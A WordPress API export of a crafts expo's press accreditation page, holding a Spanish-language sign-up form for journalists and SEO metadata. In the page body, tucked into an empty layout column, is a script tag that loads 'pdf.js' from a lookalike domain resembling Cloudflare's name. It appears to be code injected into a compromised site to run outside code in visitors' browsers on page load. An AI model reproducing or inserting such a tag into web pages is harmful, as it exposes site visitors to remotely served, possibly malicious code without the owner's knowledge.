{"id":568,"date":"2018-09-04T11:03:10","date_gmt":"2018-09-04T16:03:10","guid":{"rendered":"https:\/\/www.expomanualidades.info\/navidad\/?page_id=568"},"modified":"2023-10-24T10:41:09","modified_gmt":"2023-10-24T16:41:09","slug":"acreditacion-de-prensa","status":"publish","type":"page","link":"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/","title":{"rendered":"Acreditaci\u00f3n de Prensa"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column width=&#8221;1\/6&#8243;][vc_column_text]<\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>Se te notificar\u00e1 la acreditaci\u00f3n por medio de un correo electr\u00f3nico, y adicional se te solicitara el d\u00eda del evento una credencial vigente del medio con fotograf\u00eda.<\/strong><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/6&#8243;][\/vc_column][\/vc_row][vc_row][vc_column]\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f567-o1\" lang=\"es-MX\" dir=\"ltr\" data-wpcf7-id=\"567\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/navidad\/wp-json\/wp\/v2\/pages\/568#wpcf7-f567-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulario de contacto\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"567\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"es_MX\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f567-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/><input type=\"hidden\" name=\"_wpcf7_recaptcha_response\" value=\"\" \/>\n<\/fieldset>\n<div class=\"vc_col-sm-6\">\n\t<p><label>Nombre del medio<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-medio\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"your-medio\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label>Nombre de contacto<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-contacto\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"your-contacto\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label>Cargo<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"cargo\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"cargo\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label>Correo electr\u00f3nico<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"email\" name=\"your-email\" \/><\/span> <\/label>\n\t<\/p>\n<\/div>\n<div class=\"vc_col-sm-6\">\n\t<p><label>Tel\u00e9fono<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"phone\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"phone\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label>Sitio web<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"web\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"web\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label>Expo que deseas cubrir<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"expos\"><select class=\"wpcf7-form-control wpcf7-select\" aria-invalid=\"false\" name=\"expos\"><option value=\"Expo Mercer\u00eda y Manualidades\">Expo Mercer\u00eda y Manualidades<\/option><option value=\"Expo Mercer\u00eda y Manualidades Guadalajara\">Expo Mercer\u00eda y Manualidades Guadalajara<\/option><option value=\"Manualidades y Navidad\">Manualidades y Navidad<\/option><\/select><\/span><br \/>\n<\/label>\n\t<\/p>\n<\/div>\n<p>&nbsp;\n<\/p>\n<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Enviar\" \/>\n<\/p><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n[\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/6&#8243;][vc_column_text] [\/vc_column_text][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Se te notificar\u00e1 la acreditaci\u00f3n por medio de un correo electr\u00f3nico, y adicional se te solicitara el d\u00eda del evento una credencial vigente del medio con fotograf\u00eda. [\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/6&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":563,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/contact-template.php","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"no-sidebar","site-content-layout":"plain-container","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"","ast-featured-img":"disabled","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-568","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Acreditaci\u00f3n de Prensa - Manualidades y Navidad<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/\" \/>\n<meta property=\"og:locale\" content=\"es_MX\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Acreditaci\u00f3n de Prensa - Manualidades y Navidad\" \/>\n<meta property=\"og:description\" content=\"[vc_row][vc_column width=&#8221;1\/6&#8243;][vc_column_text] [\/vc_column_text][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Se te notificar\u00e1 la acreditaci\u00f3n por medio de un correo electr\u00f3nico, y adicional se te solicitara el d\u00eda del evento una credencial vigente del medio con fotograf\u00eda. [\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/6&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/\" \/>\n<meta property=\"og:site_name\" content=\"Manualidades y Navidad\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xpomanualidades\/\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-24T16:41:09+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/prensa\\\/acreditacion-de-prensa\\\/\",\"url\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/prensa\\\/acreditacion-de-prensa\\\/\",\"name\":\"Acreditaci\u00f3n de Prensa - Manualidades y Navidad\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/#website\"},\"datePublished\":\"2018-09-04T16:03:10+00:00\",\"dateModified\":\"2023-10-24T16:41:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/prensa\\\/acreditacion-de-prensa\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/prensa\\\/acreditacion-de-prensa\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/prensa\\\/acreditacion-de-prensa\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Prensa\",\"item\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/prensa\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Acreditaci\u00f3n de Prensa\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/#website\",\"url\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/\",\"name\":\"Manualidades y Navidad\",\"description\":\"Ac\u00e9rcate al mundo de las manualidades, donde podr\u00e1s adquirir insumos y herramientas para la elaboraci\u00f3n de distintas t\u00e9cnicas.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/#organization\",\"name\":\"Manualidades y Navidad\",\"url\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/Expo-Manualidades-Navidad-10.png\",\"contentUrl\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/Expo-Manualidades-Navidad-10.png\",\"width\":1247,\"height\":332,\"caption\":\"Manualidades y Navidad\"},\"image\":{\"@id\":\"https:\\\/\\\/www.expomanualidades.info\\\/navidad\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/xpomanualidades\\\/\",\"https:\\\/\\\/www.instagram.com\\\/expomerceriaymanualidades\\\/\",\"https:\\\/\\\/www.youtube.com\\\/channel\\\/UCrl-kP24qbcrh1Ebk4RjK9A\",\"https:\\\/\\\/www.tiktok.com\\\/@merceriaymanualidades\",\"https:\\\/\\\/open.spotify.com\\\/show\\\/0eic79uV9YVcZ9bbRjVd0p\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Acreditaci\u00f3n de Prensa - Manualidades y Navidad","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/","og_locale":"es_MX","og_type":"article","og_title":"Acreditaci\u00f3n de Prensa - Manualidades y Navidad","og_description":"[vc_row][vc_column width=&#8221;1\/6&#8243;][vc_column_text] [\/vc_column_text][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Se te notificar\u00e1 la acreditaci\u00f3n por medio de un correo electr\u00f3nico, y adicional se te solicitara el d\u00eda del evento una credencial vigente del medio con fotograf\u00eda. [\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/6&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row]","og_url":"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/","og_site_name":"Manualidades y Navidad","article_publisher":"https:\/\/www.facebook.com\/xpomanualidades\/","article_modified_time":"2023-10-24T16:41:09+00:00","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/","url":"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/","name":"Acreditaci\u00f3n de Prensa - Manualidades y Navidad","isPartOf":{"@id":"https:\/\/www.expomanualidades.info\/navidad\/#website"},"datePublished":"2018-09-04T16:03:10+00:00","dateModified":"2023-10-24T16:41:09+00:00","breadcrumb":{"@id":"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.expomanualidades.info\/navidad\/prensa\/acreditacion-de-prensa\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.expomanualidades.info\/navidad\/"},{"@type":"ListItem","position":2,"name":"Prensa","item":"https:\/\/www.expomanualidades.info\/navidad\/prensa\/"},{"@type":"ListItem","position":3,"name":"Acreditaci\u00f3n de Prensa"}]},{"@type":"WebSite","@id":"https:\/\/www.expomanualidades.info\/navidad\/#website","url":"https:\/\/www.expomanualidades.info\/navidad\/","name":"Manualidades y Navidad","description":"Ac\u00e9rcate al mundo de las manualidades, donde podr\u00e1s adquirir insumos y herramientas para la elaboraci\u00f3n de distintas t\u00e9cnicas.","publisher":{"@id":"https:\/\/www.expomanualidades.info\/navidad\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.expomanualidades.info\/navidad\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.expomanualidades.info\/navidad\/#organization","name":"Manualidades y Navidad","url":"https:\/\/www.expomanualidades.info\/navidad\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.expomanualidades.info\/navidad\/#\/schema\/logo\/image\/","url":"https:\/\/www.expomanualidades.info\/navidad\/wp-content\/uploads\/2025\/10\/Expo-Manualidades-Navidad-10.png","contentUrl":"https:\/\/www.expomanualidades.info\/navidad\/wp-content\/uploads\/2025\/10\/Expo-Manualidades-Navidad-10.png","width":1247,"height":332,"caption":"Manualidades y Navidad"},"image":{"@id":"https:\/\/www.expomanualidades.info\/navidad\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/xpomanualidades\/","https:\/\/www.instagram.com\/expomerceriaymanualidades\/","https:\/\/www.youtube.com\/channel\/UCrl-kP24qbcrh1Ebk4RjK9A","https:\/\/www.tiktok.com\/@merceriaymanualidades","https:\/\/open.spotify.com\/show\/0eic79uV9YVcZ9bbRjVd0p"]}]}},"_links":{"self":[{"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages\/568","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/comments?post=568"}],"version-history":[{"count":5,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages\/568\/revisions"}],"predecessor-version":[{"id":15582,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages\/568\/revisions\/15582"}],"up":[{"embeddable":true,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages\/563"}],"wp:attachment":[{"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/media?parent=568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}